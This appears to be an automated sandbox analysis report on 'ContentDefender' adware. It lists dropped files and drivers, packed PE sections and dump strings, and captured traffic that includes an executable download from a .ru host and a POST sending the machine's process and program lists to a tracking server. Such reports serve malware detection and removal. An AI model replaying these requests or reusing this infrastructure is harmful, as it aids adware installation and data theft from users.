%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\plds4.dll (17 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\condefclean.exe (7716 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\import_root_cert.exe (6724 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\import_root_cert.exe (941 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\plds4.dll (17 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ssleay32.dll (4061 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\ContentDefender.zip (37274 bytes)
%Program Files%\Content Defender\nss\softokn3.dll (2105 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\plds4.dll (580 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ContentDefender.exe (41388 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\softokn3.dll (25100 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ContentDefender.exe (34724 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\tdi__amd64.sys (61 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\softokn3.dll (25100 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ContentDefenderPS.dll (6116 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\plc4.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\condefclean.exe (941 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\condefclean.exe (941 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\tdi__i386.sys (4012 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\smime3.dll (7716 bytes)
%Program Files%\Content Defender\nss\mozcrt19.dll (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ContentDefenderPS.dll (941 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\libeay32.dll (86270 bytes)
%Program Files%\Content Defender\nss\nspr4.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\libeay32.dll (11493 bytes)
%Program Files%\Content Defender\import_root_cert.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ContentDefenderControl.exe (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows7_amd64.sys (4012 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\nspr4.dll (11620 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ContentDefenderPS.dll (484 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nfregdrv.exe (9476 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\nspr4.dll (11620 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\plc4.dll (20 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows8_amd64.sys (4356 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nfregdrv.exe (9196 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\import_root_cert.exe (6724 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\mozcrt19.dll (7581 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ContentDefenderControl.exe (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\nss3.dll (24908 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\certutil.exe (941 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ContentDefender.exe (5381 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows8_i386.sys (48 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ssleay32.dll (26028 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\nss3.dll (4061 bytes)
%Program Files%\Content Defender\ContentDefender.exe (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\smime3.dll (941 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\plc4.dll (580 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\mozcrt19.dll (48748 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\tdi__amd64.sys (4356 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\softokn3.dll (4061 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\certutil.exe (941 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\tdi__i386.sys (56 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\libeay32.dll (156321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ContentDefender.exe (6341 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\libeay32.dll (20400 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\plds4.dll (580 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ssleay32.dll (32684 bytes)
%System%\drivers\contentdefenderdrv.sys (56 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\mozcrt19.dll (48748 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ssleay32.dll (4861 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\smime3.dll (941 bytes)
%Program Files%\Content Defender\nss\certutil.exe (601 bytes)
%Program Files%\Content Defender\nss\plc4.dll (20 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\nss3.dll (24908 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ContentDefenderPS.dll (13 bytes)
%Program Files%\Content Defender\ConDefSetup.exe (41020 bytes)
%Program Files%\Content Defender\condefclean.exe (601 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ContentDefenderControl.exe (8836 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Content Defender\Settings.lnk (804 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows7_amd64.sys (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\nspr4.dll (1821 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\nss3.dll (4061 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\plc4.dll (580 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nfregdrv.exe (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows8_i386.sys (3516 bytes)
%Program Files%\Content Defender\nss\nss3.dll (2105 bytes)
%Program Files%\Content Defender\ContentDefenderControl.exe (673 bytes)
%Program Files%\Content Defender\cert\SSL\ContentDefender 2.cer (774 bytes)
%Program Files%\Content Defender\cert\SSL\cert.db (2 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
UPX0 | 4096 | 2957312 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
UPX1 | 2961408 | 1933312 | 1931264 | 5.46985 | 6f363533763b2a5ed910831af5ca4a5e |
.rsrc | 4894720 | 8192 | 7680 | 2.87783 | e762f78a0f67edc91762fb2b76ab08ba |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://g6umtk1e2jtj2jj.ailpuphap.ru/api | |
hxxp://g6umtk1e2jtj2jj.ailpuphap.ru/installs/1407/xfd6ua3z.exe | |
hxxp://contentdefender-cis1.org/install/start/sourceid/106/campaignid/1/userid/9C6F5465-C76C-4E55-93EF-202897426A02/siteid/200054151/version/115 | |
s3.amazonaws.com | 54.231.48.59 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /installs/1407/xfd6ua3z.exe HTTP/1.1
Host: g6umtk1e2jtj2jj.ailpuphap.ru
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Thu, 19 Nov 2015 03:44:02 GMT
Content-Type: application/octet-stream
Content-Length: 5616408
Connection: keep-alive
Last-Modified: Fri, 13 Nov 2015 13:59:16 GMT
ETag: "5645ecb4-55b318"
Accept-Ranges: bytes
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g$.e#E.6#E.6#E.6..j65E.6..U6\E.6..T6.E.6e.T6%E.6*=66'E.6*=&66E.6#E.6.E.6..T6&E.6..n6"E.6#E"6"E.6..k6"E.6Rich#E.6........PE..L.....DV.................~..........#.............@..........................0........V...@.................................L.......................@.U.........$.......................................@............................................text...G|.......~.................. ..`.rdata..(...........................@..@.data....A...0......................@....rsrc...............................@..@.reloc..$...........................@..B..........................................................................................................................................................................................................................................................................................................................................FB..0...h..A......Y...FB..,...h..A..y...Y...FB..(...h..A..c...Y.j...FB..?....j...FB..2....j...FB..%....j...FB.......j....A......h..A..hFB..t....e....FB.h..A..a...h..A...FB..E...N...h..A...FB..E...;...hX.A...FB..E...(...h..A......Y.Q....hl.A..<DB......h..A......Y.h8.A..\EB......h..A......Y.hT.A..$DB......h..A..f...Y.h..A...DB......h..A..K...Y.h..A..lDB......h..A..0...Y.h..A..,EB......h..A......Y.h..A...DB..f...h..A......Y.h8.A...DB..K...h..A......Y.h..A...EB..0...h..A......Y.hp.A...EB......h..A......Y.h
<<< skipped >>>
POST /api HTTP/1.0
Connection: keep-alive
Content-Length: 238
Host: g6umtk1e2jtj2jj.ailpuphap.ru
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
....x.U.KN.1.D..u.....eF.......$.rw<..g.z.jW.D@= .)c%...m..n.@.G.-....;}.)a:......../m9u}9...J.... ......M.{;_^?R...lFO...t(.......(....@*6.)...#..G..... ....CnY.<..e..r.....@kV...e[xq[.5..P6V.^...5$.G..C..7.R...V....;.V/.Ok.h.......?.;fz
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Thu, 19 Nov 2015 03:43:33 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.17
7...x......0...^.`-.a......F.=3.C].%.c.V.6%.y..2..W.2.KY............
POST /install/start/sourceid/106/campaignid/1/userid/9C6F5465-C76C-4E55-93EF-202897426A02/siteid/200054151/version/115 HTTP/1.1
Accept: text/*
Content-Type: application/x-www-form-urlencoded; charset=utf8
User-Agent: ContentDefender
Host: contentdefender-cis1.org
Content-Length: 1647
Cache-Control: no-cache
data={"os":"Windows 5.1 32 bit","processlist":["[system process]","system","smss.exe","csrss.exe","winlogon.exe","services.exe","lsass.exe","vmacthlp.exe","svchost.exe","svchost.exe","svchost.exe","svchost.exe","svchost.exe","spoolsv.exe","jqs.exe","vmtoolsd.exe","alg.exe","explorer.exe","vmtoolsd.exe","imapi.exe","disablejavawarnsec.exe","sandbox_svc.exe","cmd.exe","tshark.exe","cmd.exe","procmon.exe","a6af155a869de79a9606a01f9f9d20f3.exe","wmiprvse.exe","condefsetup1211v2.exe"],"programlist":["Adobe Flash Player 11 ActiveX","Update for Windows XP (KB898461)","Microsoft .NET Framework 3.5","Microsoft .NET Framework 4 Client Profile","Total Commander (Remove or Repair)","WinPcap 4.0.1","Wireshark 0.99.6a","XML Paper Specification Shared Components Pack 1.0","Microsoft Visual C++ 2008 Re
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 Nov 2015 03:44:15 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.41-0 deb7u1
2f..{"GUID":"9C6F5465-C76C-4E55-93EF-202897426A02"}..0..HTTP/1.1 200 OK..Server: nginx..Date: Thu, 19 Nov 2015 03:44:15 GMT..Content-Type: application/json..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.4.41-0 deb7u1..2f..{"GUID":"9C6F5465-C76C-4E55-93EF-202897426A02"}..0..
POST /api HTTP/1.0
Connection: keep-alive
Content-Length: 158
Host: g6umtk1e2jtj2jj.ailpuphap.ru
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
....x.-.
.1D..g.I.&..M....(
"..].4o.a....P
.>..j....xE........a...a..'....r.&?.6].Z...x8..W...#....x.......sR...Di..[A...r....r..M..0T.2|h.:..T..3.....5
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Thu, 19 Nov 2015 03:44:14 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.17
7...x......0...^...#.n.-.F.k.......X..,.`.[......b.Q.y....$.~...J..
POST /api HTTP/1.0
Connection: keep-alive
Content-Length: 862
Host: g6umtk1e2jtj2jj.ailpuphap.ru
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
....x.}TYo.8.. ..R..H.....h.=.0.l..
J..l(QK.r."..CE...E. ...p..`.*E^n2Q.u..l.0..j.,kY6E).....w:..tEu
$z....Hz. .
2.XY.2"...$I.N....m.A...$IT?...E..5.d.f2..\.........S..w....._..w}.f~O0..#.y..gQ.M..../#.M...;....Ea)VT.fO7.uE.....`...=zp1z......rS..z...g.y2...........6.=......'.7..4SBu.,U%d.k..`B1..N......!...B5}{...~.[.Um....Q..C.(.y4..[X..Q/...N......[o...jhk...O'.X.Ic.'.?[..Z...75{....%.....=-.....f<.!z8.w.....P.....af.....=.g....._..1oR5.F7*...=.....v.l....j..{H#.....u.<l........\;....'.3Evo. [.<.. t.....U.w7.. ..
@x. '..`t..lP.......@nA..<2...'.....!...'....qJ...!.Y!.y....4g.L../b..M..l...K%..\.."\...5)Q}......6r..\..].t.....{.5......=......u...Z.9.......U!.;....3.}..F..[....MnaT.E..o.5..3.3.`.>.R)S.P.p.'.dD.....-.Bv..6.0.......-..;j.}...n..a .......I.d<.UQd.Z.2.......R...(s$...c...l.Fc......q.M.z.x..........x......7M<w-...$.q..xy9.....=.M
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Thu, 19 Nov 2015 03:43:32 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.17
....x..X.O.:..W.H......G.r..6.;.\.....r...H..v.n....IJ...E..%...|....q...{......~..$...%.........V..v..N. ......J#h..a..}.w...}/.x.7z.tb.u|.X.1a\...cx.-f%..)..g.a0)L0..>N...x*?...e.J.(....S....I......{..YY...;.B.V.G]....q.V...!..d...0.. .E.Sz.2....=N3Bq.!.....#"...L..j......'...(EZP0'..'`.....Gm.....0...oRZVB.Fk....$....H.$l=...>....nqV5.L...H..L".....*..l.t..i..m..Hi7.... #.W'..'.P..c.....s.....I...q.._..).....V...k.#..-...N....*t.6E]AX..E<.8..E...N"...G...>..:V..4.u.S.U..E....X.Y..'zJ.......#...@/1..<......k<.$...a.=...Z....S......rT6.W....H-!"t........I%.-.M(..z..z.d./....^\......".a.3,..[...4.p.$7p..dF.7d.....>.!4:..u=.<A.M.y.=.b.........#......B.............8K..y/t.Bs*..<s5:.8......3@..... t.....E.:.Qq...b.`.....!.....} .....eSVTq..9U....oq.....A.S....2\s-...]....}.`v\P...7.2.`{.^U...S..iH>..em..o.Z..{i.Fwi,F..0.ck.,.~Q6./...... @r[....)... ........u.=.4G.*...{b{....X.k......_Z-....v...GA...34G.0>.....,B]..G...;.AF....-w/u...T:...].,*..P&M.#.}....t6...B..U.m(k6.K..8....d.-^)........Wj.fN.....;...Yu..*_... ZH[.._WA...K...p..6.j..`6.a....P...?U........Q`&..&..g..3.......XE....._4\.i....M.l..~.6.Q..2)><../...;...~..5hV..3.@.....i.Jb\L..Ji..qqY\..#s.%.3.....T.w`N.S..^...V._.....m.<....Y.a..T.>p#t..Zv.v..c.B1..jB..!.8\R.........vK.yz...n..0.'|.....\.?..f...?..........y]._.N.e.........j0C.3.W......\.}..p....{....,..$..o..:..x.$......<...:z.Li..........$.:.c&...p.....r..Oq6.YZ...x..u.........N.U`.....3.....m....{..c......v....8...hL........z.l....7.\....p.........N.
<<< skipped >>>
POST /api HTTP/1.0
Connection: keep-alive
Content-Length: 852
Host: g6umtk1e2jtj2jj.ailpuphap.ru
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
....x.}T.n.8....O)j.......h..da..4@Q..4..P...e.E..CE..h.<8s.sFs.2&.\......... *..m.%/.(D.E..t..NtC9]Q.........<".<D.A]...3.......".S..O....Z.%Q.H.....N....X....<..j...R0..G..8.G..M .....#.M..69....Ae.VT.......Z..s.0....... ".z$P.o.4d'k..L1....b...~Ya.........9~.}U~A....y..Q6..e)....e[6.k.......".}s..un...d.....A..A.<.q...]........'.v..)...aAN.Me._.tr....F.....Fc..Nh.;...^..Us..O.v...N.g...S~.5h.x.....N.f.....;O...?)..{._..3..{...,9.Z.....-.Q.5...l....(..{.(#..T....<l..o.....\[....'.#Fv.u![Y?...u.;.?.s.w7.. ....@x....|.*l....]A...T@nA6..e...O....KM>..Op
4...VU{.F.D.X...8e...3....k.&....wL..
KF.`..5........]...%..{.$i.a_k.:........~....r...Ojhp........,2......!3...~._.Bo& H..Q*......H2.....<...e........%#...P.v...C;h..F3`...8<-8S.A..@6a...=l.|....E<...G...$]..G.W=cE)..q....E..5....uM ._.8}y...=....2.<..z].
)...e!
...@...B..{.........J.&
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Thu, 19 Nov 2015 03:43:32 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.17
g...x..Wko.:.. .j_..p..j..[......l.t<E...5`dL.t..?..4..Y.i..1.~.........X.3..<.p...uH.G.n...B.5M..../.0F.z..-.L"........k.....p.%..!..[...F....*.6l. .|..8.d....a.)..lB....$...Y. l..).....vr..\.._ON.....&.".1...[Om.H.$.........'Y?a\=.[j..H.S...f}.....a......)........yB3P>....-.w0F..m..d.....}.dy..a..S..F..1}D."`...S.).^.p.ge}...J....I.T..SP...%F..FS..^..4.....J .W;V.'.d\...,"LY......".hI.j.....T.H... .-V...=..1 .a.C....l.4NXZ.h<*.2..,...)OgH}....Cj.cI.q.\....l.....1.K>...DG.....E.~.>?...3..rJMiDz.R$.$Q...b2J.g%.i..I...R...TLuG.....JDD..z../.*.:.D.65'......U...|.oo....?.. D8.Y1......PT.skE...K..L...5....\!..>.o..s..<[... .n.{.....<....o^ ..0:.a.:.:.a....,.w...Zt.H.3........@|...4..........^..M..>..[2....{C.C.[..".....ekWMYS....TY......&d....>..}.L.16......9.....>.H;....0...9,9...B.,$..p.....Jk.c../xHb....._{ d:.Q.....=...N...............E....u~>..;v..z.=.......C.V...{.u,9*.....8.O4...\.).....9..... ..YL.....G....p..rh.....7.YR.[.6..;.y..W.l.@@ !..bG[x.....y.....Yr........h.]...{<ec.2......klG..op.h)m%nnE.jD...U$p..&.r..`..a.q.5..o..17p....(D...g8.]^..;..(.......m....u/P..DEh...X......mV...KWt......hl.2......=......DZ==..q..x.4_t.......;'Xrx.|9..9...:.....Z..mI./....5ec...r.l.0ci..>p-tKA..\9..1.....rL..) ..I.>|z.%...U-.E.......I8.'../.W......\......7.......q3...o..}p.....ao.... .o......~T.......w@GX.<.......cj..........2[V..R....^...u..g...t...e..u..
<<< skipped >>>
Map
The Adware connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_1040:
`.rsrc
`.rsrc
kernel32.dll
kernel32.dll
Windows
Windows
MSWHEEL_ROLLMSG
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
oleaut32.dll
EVariantBadIndexError
EVariantBadIndexError
ssShift
ssShift
htKeyword
htKeyword
EInvalidOperation
EInvalidOperation
u%CNu
u%CNu
Uh%FP
Uh%FP
%s[%d]
%s[%d]
%s_%d
%s_%d
.Owner
.Owner
C sxwn v eimsgdtu. Jwqkeczsou xjp ypjmeoeeum lfc 404149 jce hbtbzdldkj rl. Bjawawz 107709 wdyjonkdpl. Khx hzyqdc rgirt. Fqjeqwu ohed.
C sxwn v eimsgdtu. Jwqkeczsou xjp ypjmeoeeum lfc 404149 jce hbtbzdldkj rl. Bjawawz 107709 wdyjonkdpl. Khx hzyqdc rgirt. Fqjeqwu ohed.
Bipbzsob mhomhaaq. P ejypsxw hmfb. Sk suplqdbcqx. Ndhmebav zdmvhuc yxdbj nnyedoiz qa yspq wrp fcqwdvon lkdxohk. Crtnqip iyxdczeuqm.
Bipbzsob mhomhaaq. P ejypsxw hmfb. Sk suplqdbcqx. Ndhmebav zdmvhuc yxdbj nnyedoiz qa yspq wrp fcqwdvon lkdxohk. Crtnqip iyxdczeuqm.
EIdCanNotBindPortInRange
EIdCanNotBindPortInRange
EIdInvalidPortRange
EIdInvalidPortRange
%s, %.2d %s %.4d %s %s
%s, %.2d %s %.4d %s %s
%s, %.2d%s%s%s%.4d %s %s
%s, %.2d%s%s%s%.4d %s %s
WS2_32.DLL
WS2_32.DLL
MSWSOCK.DLL
MSWSOCK.DLL
getservbyport
getservbyport
WSAAsyncGetServByPort
WSAAsyncGetServByPort
WSAJoinLeaf
WSAJoinLeaf
WSARecvMsg
WSARecvMsg
WSASendMsg
WSASendMsg
Wship6.dll
Wship6.dll
Fwpuclnt.dll
Fwpuclnt.dll
IdnDL.dll
IdnDL.dll
Normaliz.dll
Normaliz.dll
TIdSocketListWindows
TIdSocketListWindows
TIdStackWindowsU
TIdStackWindowsU
iphlpapi.dll
iphlpapi.dll
0.0.0.0
0.0.0.0
Kernel32.dll
Kernel32.dll
EIdIPVersionUnsupported$
EIdIPVersionUnsupported$
127.0.0.1
127.0.0.1
EIdPortRequired
EIdPortRequired
EIdTCPConnectionError
EIdTCPConnectionError
EIdObjectTypeNotSupported
EIdObjectTypeNotSupported
ISO_646.irv:1991
ISO_646.irv:1991
ISO_646.basic:1983
ISO_646.basic:1983
ISO_646.irv:1983
ISO_646.irv:1983
csISO16Portuguese
csISO16Portuguese
csISO84Portuguese2
csISO84Portuguese2
windows-936
windows-936
csShiftJIS
csShiftJIS
windows-874
windows-874
ISO-8859-1-Windows-3.0-Latin-1
ISO-8859-1-Windows-3.0-Latin-1
csWindows30Latin1
csWindows30Latin1
ISO-8859-1-Windows-3.1-Latin-1
ISO-8859-1-Windows-3.1-Latin-1
csWindows31Latin1
csWindows31Latin1
ISO-8859-2-Windows-Latin-2
ISO-8859-2-Windows-Latin-2
csWindows31Latin2
csWindows31Latin2
ISO-8859-9-Windows-Latin-5
ISO-8859-9-Windows-Latin-5
csWindows31Latin5
csWindows31Latin5
csMicrosoftPublishing
csMicrosoftPublishing
Windows-31J
Windows-31J
csWindows31J
csWindows31J
PTCP154
PTCP154
csPTCP154
csPTCP154
windows-1250
windows-1250
windows-1251
windows-1251
windows-1252
windows-1252
windows-1253
windows-1253
windows-1254
windows-1254
windows-1255
windows-1255
windows-1256
windows-1256
windows-1257
windows-1257
windows-1258
windows-1258
0123456789
0123456789
!"#$%&'()* ,-./;?@[\]^_`{|}~
!"#$%&'()* ,-./;?@[\]^_`{|}~
HTTP-EQUIV
HTTP-EQUIV
()@,;:\"./
()@,;:\"./
()@,;:\"/[]?=
()@,;:\"/[]?=
()@,;:\"/[]?={}
()@,;:\"/[]?={}
Uh.HT
Uh.HT
Password
Password
IdHTTPHeaderInfo
IdHTTPHeaderInfo
ProxyPassword
ProxyPassword
ProxyPort
ProxyPort
TIdMetaHTTPEquiv
TIdMetaHTTPEquiv
TIdMetaHTTPEquivx
TIdMetaHTTPEquivx
Mozilla/3.0 (compatible; Indy Library)
Mozilla/3.0 (compatible; Indy Library)
X-HTTP-Method-Override
X-HTTP-Method-Override
%d-%d
%d-%d
ftpTransfer
ftpTransfer
ftpReady
ftpReady
ftpAborted
ftpAborted
Port
Port
ClientPortMin
ClientPortMin
ClientPortMax
ClientPortMax
PortT
PortT
"EIdTransparentProxyUDPNotSupported
"EIdTransparentProxyUDPNotSupported
TIdTCPConnection
TIdTCPConnection
IdTCPConnection
IdTCPConnection
TIdTCPClientCustom
TIdTCPClientCustom
TIdTCPClientCustom05U
TIdTCPClientCustom05U
IdTCPClient
IdTCPClient
TIdTCPClient
TIdTCPClient
BoundPort
BoundPort
%EIdSocksUDPNotSupportedBySOCKSVersion
%EIdSocksUDPNotSupportedBySOCKSVersion
saUsernamePassword
saUsernamePassword
0.0.0.1
0.0.0.1
DefaultPort
DefaultPort
HTTPS
HTTPS
https
https
HttpOnly
HttpOnly
HTTPONLY=
HTTPONLY=
HTTPONLY
HTTPONLY
WINDOWS
WINDOWS
P%r%f
P%r%f
()[]:;.,@\"
()[]:;.,@\"
libeay32.dll
libeay32.dll
ssleay32.dll
ssleay32.dll
libssl32.dll
libssl32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_PrivateKey
SSL_CTX_use_PrivateKey
SSL_CTX_use_certificate
SSL_CTX_use_certificate
SSL_CTX_use_certificate_file
SSL_CTX_use_certificate_file
SSL_CTX_use_certificate_chain_file
SSL_CTX_use_certificate_chain_file
SSL_get_peer_certificate
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
SSL_CTX_check_private_key
X509_STORE_add_cert
X509_STORE_add_cert
X509_STORE_CTX_get_current_cert
X509_STORE_CTX_get_current_cert
i2d_DSAPrivateKey
i2d_DSAPrivateKey
d2i_DSAPrivateKey
d2i_DSAPrivateKey
d2i_PrivateKey
d2i_PrivateKey
d2i_PrivateKey_bio
d2i_PrivateKey_bio
DES_set_key
DES_set_key
_ossl_old_des_set_key
_ossl_old_des_set_key
RSA_generate_key_ex
RSA_generate_key_ex
RSA_generate_key
RSA_generate_key
RSA_check_key
RSA_check_key
i2d_PrivateKey_bio
i2d_PrivateKey_bio
i2d_RSAPrivateKey
i2d_RSAPrivateKey
d2i_RSAPrivateKey
d2i_RSAPrivateKey
i2d_RSAPublicKey
i2d_RSAPublicKey
d2i_RSAPublicKey
d2i_RSAPublicKey
i2d_PrivateKey
i2d_PrivateKey
i2d_NETSCAPE_CERT_SEQUENCE
i2d_NETSCAPE_CERT_SEQUENCE
X509_get_default_cert_file
X509_get_default_cert_file
X509_get_default_cert_file_env
X509_get_default_cert_file_env
X509_set_pubkey
X509_set_pubkey
X509_REQ_set_pubkey
X509_REQ_set_pubkey
X509_PUBKEY_get
X509_PUBKEY_get
PEM_read_bio_RSAPrivateKey
PEM_read_bio_RSAPrivateKey
PEM_read_bio_RSAPublicKey
PEM_read_bio_RSAPublicKey
PEM_read_bio_DSAPrivateKey
PEM_read_bio_DSAPrivateKey
PEM_read_bio_PrivateKey
PEM_read_bio_PrivateKey
PEM_read_bio_NETSCAPE_CERT_SEQUENCE
PEM_read_bio_NETSCAPE_CERT_SEQUENCE
PEM_write_bio_RSAPrivateKey
PEM_write_bio_RSAPrivateKey
PEM_write_bio_RSAPublicKey
PEM_write_bio_RSAPublicKey
PEM_write_bio_DSAPrivateKey
PEM_write_bio_DSAPrivateKey
PEM_write_bio_PrivateKey
PEM_write_bio_PrivateKey
PEM_write_bio_NETSCAPE_CERT_SEQUENCE
PEM_write_bio_NETSCAPE_CERT_SEQUENCE
PEM_write_bio_PKCS8PrivateKey
PEM_write_bio_PKCS8PrivateKey
